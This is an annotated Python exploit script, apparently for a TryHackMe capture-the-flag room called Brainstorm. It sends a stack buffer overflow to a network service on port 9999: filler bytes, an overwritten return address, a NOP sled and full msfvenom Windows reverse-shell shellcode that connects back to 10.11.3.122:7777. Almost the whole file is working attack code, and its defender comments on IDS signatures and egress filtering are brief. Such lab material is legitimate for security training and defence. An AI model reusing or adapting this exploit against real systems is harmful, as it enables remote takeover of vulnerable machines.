thm-brainstorm-revshell.py
import socket
import sys
# First reply sent to the service (CRLF is appended at send time), ahead of
# the oversized message below.
username = b"puckie"
# Second reply: 2012 filler bytes, then a 4-byte value, then 32 bytes of 0x90
# (the x86 NOP opcode); the shellcode in `payload` is appended at send time.
# NOTE(review): presumably 2012 is the offset to the saved return address in
# the target and the 4 bytes (0x625014df when read little-endian) replace it;
# neither is shown on this page, so confirm against the author's write-up.
# Defender view: input of this shape only matters if the service copies it
# into a fixed-size buffer without a length check. A long single-byte run
# followed by a run of 0x90 in one client message is a simple IDS signature
# for this class of input.
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
# Shellcode bytes. Per the author, generated with:
#   msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=7777 -b"\x00" -f c EXITFUNC=thread
# -b"\x00" keeps NUL bytes out of the encoded output.
# Defender view: the payload name is a Windows reverse TCP shell, so a
# successful run would appear as the service process opening an outbound
# connection to 10.11.3.122:7777. Egress filtering and process-level network
# telemetry are the controls that would catch it.
payload = (b"\xbf\x81\x0b\x8f\xa7\xd9\xeb\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
b"\x52\x31\x7d\x12\x83\xed\xfc\x03\xfc\x05\x6d\x52\x02\xf1\xf3"
b"\x9d\xfa\x02\x94\x14\x1f\x33\x94\x43\x54\x64\x24\x07\x38\x89"
b"\xcf\x45\xa8\x1a\xbd\x41\xdf\xab\x08\xb4\xee\x2c\x20\x84\x71"
b"\xaf\x3b\xd9\x51\x8e\xf3\x2c\x90\xd7\xee\xdd\xc0\x80\x65\x73"
b"\xf4\xa5\x30\x48\x7f\xf5\xd5\xc8\x9c\x4e\xd7\xf9\x33\xc4\x8e"
b"\xd9\xb2\x09\xbb\x53\xac\x4e\x86\x2a\x47\xa4\x7c\xad\x81\xf4"
b"\x7d\x02\xec\x38\x8c\x5a\x29\xfe\x6f\x29\x43\xfc\x12\x2a\x90"
b"\x7e\xc9\xbf\x02\xd8\x9a\x18\xee\xd8\x4f\xfe\x65\xd6\x24\x74"
b"\x21\xfb\xbb\x59\x5a\x07\x37\x5c\x8c\x81\x03\x7b\x08\xc9\xd0"
b"\xe2\x09\xb7\xb7\x1b\x49\x18\x67\xbe\x02\xb5\x7c\xb3\x49\xd2"
b"\xb1\xfe\x71\x22\xde\x89\x02\x10\x41\x22\x8c\x18\x0a\xec\x4b"
b"\x5e\x21\x48\xc3\xa1\xca\xa9\xca\x65\x9e\xf9\x64\x4f\x9f\x91"
b"\x74\x70\x4a\x35\x24\xde\x25\xf6\x94\x9e\x95\x9e\xfe\x10\xc9"
b"\xbf\x01\xfb\x62\x55\xf8\x6c\x87\xa1\x01\x17\xff\xb7\x05\xf9"
b"\x9e\x3e\xe3\x6f\x71\x17\xbc\x07\xe8\x32\x36\xb9\xf5\xe8\x33"
b"\xf9\x7e\x1f\xc4\xb4\x76\x6a\xd6\x21\x77\x21\x84\xe4\x88\x9f"
b"\xa0\x6b\x1a\x44\x30\xe5\x07\xd3\x67\xa2\xf6\x2a\xed\x5e\xa0"
b"\x84\x13\xa3\x34\xee\x97\x78\x85\xf1\x16\x0c\xb1\xd5\x08\xc8"
b"\x3a\x52\x7c\x84\x6c\x0c\x2a\x62\xc7\xfe\x84\x3c\xb4\xa8\x40"
b"\xb8\xf6\x6a\x16\xc5\xd2\x1c\xf6\x74\x8b\x58\x09\xb8\x5b\x6d"
b"\x72\xa4\xfb\x92\xa9\x6c\x1b\x71\x7b\x99\xb4\x2c\xee\x20\xd9"
b"\xce\xc5\x67\xe4\x4c\xef\x17\x13\x4c\x9a\x12\x5f\xca\x77\x6f"
b"\xf0\xbf\x77\xdc\xf1\x95")
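# Delivery step: open one TCP session to the lab host (an RFC 1918 private
# address), answer the first prompt with `username`, then send the oversized
# `message` followed by `payload` as the second input.
try:
    print("Sending the payload ...")
    # The context manager closes the socket on every path; the original only
    # closed it when every call succeeded.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect(('10.10.58.137', 9999))
        # Two reads before the first send: presumably a banner and the
        # username prompt. Confirm against the service's actual dialogue.
        s.recv(1024)
        s.recv(1024)
        s.send(username + b'\r\n')
        # Presumably the message prompt.
        s.recv(1024)
        s.send(message + payload + b'\r\n')
        s.recv(1024)
except OSError as err:
    # Only socket/OS failures are handled here. The original bare `except:`
    # also swallowed KeyboardInterrupt and programming errors and reported
    # all of them as a connection failure.
    print("Cannot connect to the server ...")
    # The failure may have happened after connect(), so record the real cause.
    print(f"Socket error: {err}", file=sys.stderr)
    # NOTE(review): sys.exit() with no argument exits with status 0 even on
    # this failure path; kept as in the original.
    sys.exit()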